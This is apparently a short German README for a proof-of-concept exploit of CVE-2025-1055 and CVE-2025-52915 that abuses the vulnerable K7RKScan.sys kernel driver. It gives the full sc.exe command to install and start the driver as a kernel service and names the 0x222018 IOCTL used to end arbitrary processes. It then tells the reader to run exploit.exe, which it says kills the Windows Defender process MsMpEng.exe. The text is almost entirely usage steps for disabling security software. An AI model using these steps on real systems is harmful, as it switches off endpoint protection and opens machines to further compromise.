
PoC für CVE-2025-1055 und CVE-2025-52915 unter Verwendung von K7RKScan.sys
PoC für CVE-2025-1055 und CVE-2025-52915 mithilfe von K7RKScan.sys. Dieser PoC verwendet die 0x222018-IOCTL, um beliebige Prozesse zu beenden.
Treiber installieren:
sc.exe create K7RKScan_1516.sys binPath=C:\Users\Administrator\Downloads\K7RKScan_1516.sys type=kernel && sc.exe start K7RKScan_1516.sys
PoC ausführen:
exploit.exe
Er beendet den Prozess MsMpEng.exe (Windows Defender).